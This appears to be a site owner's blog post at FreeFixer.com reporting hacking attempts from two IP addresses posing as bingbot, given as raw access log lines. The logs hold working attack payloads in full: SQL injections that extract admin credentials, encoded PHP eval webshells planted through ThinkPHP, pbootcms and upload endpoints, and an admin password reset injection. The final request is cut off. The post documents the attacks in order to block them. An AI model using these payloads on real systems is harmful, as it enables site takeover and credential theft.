124.156.120.3 - - [17/Sep/2019:14:09:01 -0700] "GET //user.php?act=login HTTP/1.1" 404 415 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:280:\"/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a326b75634768774a79776e4a45496a5444772f63476877494756325957776f4a46395154314e55573139644b54732f506963702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:3:\"'/\";}" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:02 -0700] "GET //i.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:02 -0700] "GET //user.php?act=login HTTP/1.1" 404 413 "45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:\"num\";s:289:\"/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a326b75634768774a79776e4a45496a5444772f63476877494756325957776f4a46395154314e55573139644b54732f506963702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:11:\"-1' UNION/\";}45ea207d7a2b68c49582d2d22adf953a" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:03 -0700] "GET //i.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:04 -0700] "GET //index.php?c=api&m=data2&auth=50ce0d2401ce4802751739552c8e4467&param=update_avatar&file=data:image/php;base64,PD9waHAgQGV2YWwoJF9QT1NUW3NoZWxsXSk7Pz5ibHNoZWxs HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:04 -0700] "GET //uploadfile/member/0/0x0.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:05 -0700] "POST //index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 124.156.120.3 - - [17/Sep/2019:14:09:05 -0700] "GET //index.php/list/5/?current={pboot:if(eval\\($_GET['a']))}1{/pboot:if}&a=fputs(fopen(base64_decode('eC5waHA'),'w'),%20base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydibCddKTsgPz5ibHNoZWxs')) HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:06 -0700] "GET //x.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:07 -0700] "HEAD //index.php?_m=mod_email&_a=do_mail HTTP/1.1" 404 396 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:07 -0700] "HEAD //news/html/?410'union//select//1//from//(select//count(),concat(floor(rand(0)2),0x3a,(select//concat(0x23,0x23,0x23,user,0x3a,password,0x23,0x23,0x23)//from//pwn_base_admin//limit//0,1),0x3a)a//from//information_schema.tables//group//by//a)b//where'1'='1.html HTTP/1.1" 404 394 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:08 -0700] "HEAD //news/html/?410%27union//select//1//from//(select//count(),concat(floor(rand(0)2),0x3a,(select//concat(0x23,0x23,0x23,user,0x3a,password,0x23,0x23,0x23)//from//pwn_base_admin//limit//0,1),0x3a)a//from//information_schema.tables//group//by//a)b//where%271%27=%271.html HTTP/1.1" 404 394 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:08 -0700] "HEAD //install/index.php?_m=frontpage&_a=setting&default_tpl=jixie-110118-a16 HTTP/1.1" 404 394 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:09 -0700] "HEAD //Database/NwebCn_Site.mdb HTTP/1.1" 404 394 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:09 -0700] "HEAD //admin/login/login_check.php?met_cookie_filter%5Ba%5D=a%27,admin_pass=md5(1234567)+where+id=1;+%23-- HTTP/1.1" 200 196 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:11 -0700] "POST //admin/login/login_check.php?langset=cn HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:11 -0700] "HEAD //mx_form HTTP/1.1" 404 394 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:12 -0700] "HEAD //SiteFiles/Module/cms/logo.gif HTTP/1.1" 404 398 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:12 -0700] "GET //member/login.php/aa'UNION%20SELECT%20(select%20concat(admin_id,0x23,admin_pass)%20from%20met_admin_table%20limit%201),2,3,4,5,6,1111,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%23/aa HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:13 -0700] "POST //index.php?c=upload&f=save HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:13 -0700] "POST //index.php?g=Api&m=Plugin&a=fetch HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

106.52.197.96 – Hacking Attempt

Recently I’ve been keeping an eye on the traffic at FreeFixer.com and trying to block fake Bing and Google bots and other types of bad behaviour. This morning I found a bunch of hacking attempts from 106.52.197.96, which by they way appears to be located on the Tencent cloud computing (Beijing) Co., Ltd network range. I’m guessing one of Tencent’s cloud clients got hacked.

I’ve posted the requests below. 106.52.197.96 attempts to inject some PHP and SQL code. For obvious reason, this IP will be blocked in .htaccess.

106.52.197.96 - - [15/Sep/2019:20:00:03 -0700] "PUT //9n2q0m7jOHN7dcr6.txt HTTP/1.1" 404 4696 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:07 -0700] "GET //type.php?template=tag_(){};@unlink(FILE);print_r(blshell);assert($_POST[58B040zuEc1FAlfs]);{//../rss HTTP/1.1" 404 4696 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:07 -0700] "GET //data/cache_template/rss.tpl.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:11 -0700] "GET //index.php?s=index/\think\template\driver\file/write&cacheFile=19x8MpcV8A7T9DEl.php&content=%3C%3F%70%68%70%0D%0A%0D%0A%0D%0A%24%5F%63%6F%6E%66%69%67%20%3D%20%61%72%72%61%79%28%29%3B%0D%0A%0D%0A%2F%2F%20%20%20%43%4F%4E%46%49%47%20%41%41%41%0A%0D%45%56%41%4C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%20%20%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%61%61%61%0A%0D%65%76%61%6C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%27%5D%20%3D%20%27%61%61%61%61%27%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%53%4F%55%52%43%45%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%63%64%62%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%54%41%52%47%45%54%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%78%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%70%72%65%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%55%43%45%4E%54%45%52%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%54%48%45%20%45%4E%44%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%0D%0A%3F%3E%3C%3F%70%68%70%20%65%63%68%6F%20%27%65%63%68%6F%27%2E%27%54%68%69%6E%6B%50%48%50%27%3F%3E HTTP/1.1" 404 4698 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:11 -0700] "GET //19x8MpcV8A7T9DEl.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:11 -0700] "GET //?s=index/\think\template\driver\file/write&cacheFile=19x8MpcV8A7T9DEl.php&content=%3C%3F%70%68%70%0D%0A%0D%0A%0D%0A%24%5F%63%6F%6E%66%69%67%20%3D%20%61%72%72%61%79%28%29%3B%0D%0A%0D%0A%2F%2F%20%20%20%43%4F%4E%46%49%47%20%41%41%41%0A%0D%45%56%41%4C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%20%20%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%61%61%61%0A%0D%65%76%61%6C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%27%5D%20%3D%20%27%61%61%61%61%27%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%53%4F%55%52%43%45%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%63%64%62%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%54%41%52%47%45%54%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%78%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%70%72%65%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%55%43%45%4E%54%45%52%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%54%48%45%20%45%4E%44%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%0D%0A%3F%3E%3C%3F%70%68%70%20%65%63%68%6F%20%27%65%63%68%6F%27%2E%27%54%68%69%6E%6B%50%48%50%27%3F%3E HTTP/1.1" 200 7349 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:12 -0700] "GET //19x8MpcV8A7T9DEl.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:12 -0700] "GET //?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=19x8MpcV8A7T9DEl.php&vars[1][]=%3C%3F%70%68%70%0D%0A%0D%0A%0D%0A%24%5F%63%6F%6E%66%69%67%20%3D%20%61%72%72%61%79%28%29%3B%0D%0A%0D%0A%2F%2F%20%20%20%43%4F%4E%46%49%47%20%41%41%41%0A%0D%45%56%41%4C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%20%20%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%61%61%61%0A%0D%65%76%61%6C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%27%5D%20%3D%20%27%61%61%61%61%27%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%53%4F%55%52%43%45%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%63%64%62%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%54%41%52%47%45%54%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%78%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%70%72%65%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%55%43%45%4E%54%45%52%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%6